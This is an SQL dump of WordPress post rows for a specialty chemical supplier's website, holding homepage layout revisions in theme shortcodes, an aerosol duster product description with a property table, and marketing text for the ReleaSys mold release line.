INSERT INTO `wp_posts` VALUES (487, 1, '2016-08-18 18:10:04', '2016-08-18 18:10:04', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="4/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n<span style="line-height: 1.5;">[button text="TECH SUPPORT" link="https://" style="primary"][/col]</span>\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 18:10:04', '2016-08-18 18:10:04', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (488, 1, '2016-08-18 18:10:26', '2016-08-18 18:10:26', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="6/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n<span style="line-height: 1.5;">[button text="TECH SUPPORT" link="https://" style="primary"][/col]</span>\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 18:10:26', '2016-08-18 18:10:26', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (489, 3, '2016-08-18 18:11:45', '2016-08-18 18:11:45', 'Aero Duster MS-222N contains ultra pure HFC 134a propellant and compressed air which is used to remove dust from electronics, computers, magnetic tapes, optics, and other sensitive equipment. It is nonflammable, odorless, nonconductive, and leaves no residue. 14 oz Aerosol. These Aero-Dusters perform as compressed air that deliver a dry blast to remove microscopic dust innumerous applications in areas of electronic,photographic, computer, and other energized electrical equipment. The Aero Duster MS-222N is a pure product with no traces of contaminates and oils, which is essential for critical applications.\r\nAero Duster MS-222N removes microscopic dust from:\r\n<ul>\r\n 	<li>Semiconductor chips</li>\r\n 	<li>Specimens under electron microscopes</li>\r\n 	<li>Photographic negatives</li>\r\n 	<li>Energized Electrical Equipment such as:</li>\r\n 	<li>Microminiature assemblies</li>\r\n 	<li>Electromechanical instruments</li>\r\n 	<li>Magnetic tapes &amp; heads</li>\r\n 	<li>Servomechanisms</li>\r\n 	<li>Computer peripherals</li>\r\n 	<li>The <strong>Cobra Duster extension, MS-228</strong>, may be used in conjunction with the Aero-Duster for delivery to elusive trouble spots on various equipment.</li>\r\n</ul>\r\n<strong>MS-222L</strong>: Also available in a low global warming formulation. The MS-222L a high purity product with no traces of contaminates and oils, which is essential for critical applications. Removes microscopic dust. Recommended for electro-mechanical instruments, computer equipment, optics and other equipment. May be used with the MS-228 Cobra® Duster extension for use in hard to reach areas. Nonflammable. Low GWP (global warming potential). No ODC (ozone depleting chemicals).\r\n<table width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Molecular Weight</td>\r\n<td style="text-align: center;" width="180">115</td>\r\n</tr>\r\n<tr>\r\n<td>Boiling Point</td>\r\n<td style="text-align: center;">-19°C</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor Pressure (mmHg)</td>\r\n<td style="text-align: center;">60.8 psia @ 20°C</td>\r\n</tr>\r\n<tr>\r\n<td>Density</td>\r\n<td style="text-align: center;">1.17 @ 21.1°C</td>\r\n</tr>\r\n<tr>\r\n<td>VOC</td>\r\n<td style="text-align: center;">Exempt</td>\r\n</tr>\r\n<tr>\r\n<td>ODP</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>GWP</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'AeroDuster® MS-222N', 'The convenient nonflammable way to remove microscopic dust. Recommended for electromechanical instruments, computer equipment, and optics. High purity. May be used with MS-228 Cobra® Duster extension for use in hard to reach areas. No ODC (ozone depleting chemicals). NSN 6850-01-346-9144 (14 oz)', 'publish', 'open', 'closed', '', 'aero-duster-ms-222n', '', '', '2016-11-12 14:15:49', '2016-11-12 14:15:50', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=489', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (490, 3, '2016-08-18 18:12:27', '2016-08-18 18:12:27', '', 'EPON', '', 'publish', 'open', 'closed', '', 'epon', '', '', '2016-08-19 16:45:31', '2016-08-19 16:45:31', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=490', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (491, 1, '2016-08-18 18:13:10', '2016-08-18 18:13:10', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6" align="center"]\r\n\r\n<span style="line-height: 1.5;">[button text="TECH SUPPORT" link="https://" style="primary"]</span>\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 18:13:10', '2016-08-18 18:13:10', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (492, 1, '2016-08-18 18:15:24', '2016-08-18 18:15:24', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6" align="left"]\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 18:15:24', '2016-08-18 18:15:24', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (493, 1, '2016-08-18 18:16:20', '2016-08-18 18:16:20', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n<p style="text-align: center;">We are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.</p>\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6" align="left"]\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 18:16:20', '2016-08-18 18:16:20', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (494, 1, '2016-08-18 18:17:43', '2016-08-18 18:17:43', '[product_categories number="10" parent="0" columns="4" title="Our categories"]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" text_width="70%" text_align="center" text_pos="center" parallax="0" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-08-18 18:17:43', '2016-08-18 18:17:43', '', 116, 'https://132.148.10.86/wordpress/116-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (495, 3, '2016-10-10 20:05:16', '2016-10-10 20:05:16', '[row]\r\n\r\n[col span="6"]\r\n\r\n[ux_banner height="600px" bg="523" link="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent/"]\r\n\r\n[text_box width="45" width__sm="60" scale="123" animate="fadeIn" position_x="100" position_y="20" text_align="left"]\r\n\r\n[title style="center" text="Semi-Permanent Mold Release" size="88"]\r\n<h1><strong>ReleaSys</strong></h1>\r\n<strong><em>Miller-Stephenson Exclusive Product</em></strong><a class="button alt-button white" title="" href="../chemicals/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="6"]\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys Release Agent is backed by more than 40 years of research and development experience.  ReleaSys was developed to be the most technological advanced release agent system on the market, capable of releasing the most complex materials in the most demanding molding operations.  Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process. Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\nSemi-permanent release agents are state-of-the-art release systems that provide the molding industry with an alternative to the traditional high volume, apply-every-cycle release agent. Miller-Stephenson has developed the ReleaSys product line in an effort to offer a high efficiency, cost-effective, and technologically advanced release agent to our customers. Our semi-permanent release agents forms a chemical bond to the mold surface which results in exceptional surface adhesion, durability, and application efficiency. All variants of the ReleaSys Series will deliver higher productivity, lower rejection rates, and higher quality products even in the most demanding applications. We offer various slip-levels and have specialized formulations for differing polymer types and molding processes ( ie: injection, transfer, compression). Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites, elastomers and organic polymers. Miller-Stephenson has spent years improving and tailoring our mold release agents and specifically our ReleaSys release agent to deliver the highest value proposition by increasing application efficiency, reducing manufacturing downtime, and enhancing finished part quality and consistency.\r\n\r\n[button text="Download ReleaSys Product Guide" style="primary" link="../wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf"]\r\n\r\n[/col]\r\n\r\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-autosave-v1', '', '', '2016-10-10 20:05:16', '2016-10-10 20:05:16', '', 455, 'https://132.148.10.86/wordpress/455-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (497, 1, '2016-08-18 18:32:44', '2016-08-18 18:32:44', '[product_categories number="10" parent="0" columns="8" title="Our categories"]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" text_width="70%" text_align="center" text_pos="center" parallax="0" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-08-18 18:32:44', '2016-08-18 18:32:44', '', 116, 'https://132.148.10.86/wordpress/116-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (498, 3, '2016-08-18 18:38:14', '2016-08-18 18:38:14', '[ux_banner height="600px" text_color="dark" animated="fadeIn" text_width="40%" text_align="left" text_pos="left center" parallax="0" parallax_text="0"]\r\n<h2 class="uppercase">INCREDIBLE RESPONSIVE, With A Clean Design</h2>\r\n<h4 class="thin-font">The Multi-Purpose Business and eCommerce Wordpress Theme</h4>\r\n___\r\n\r\n<a class="button alt-button" href="https://#">SHOP NOW</a>\r\n\r\n[/ux_banner]\r\n<h3></h3>', 'Introducing ReleaSys - Our Newest Release Agent', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 18:38:14', '2016-08-18 18:38:14', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
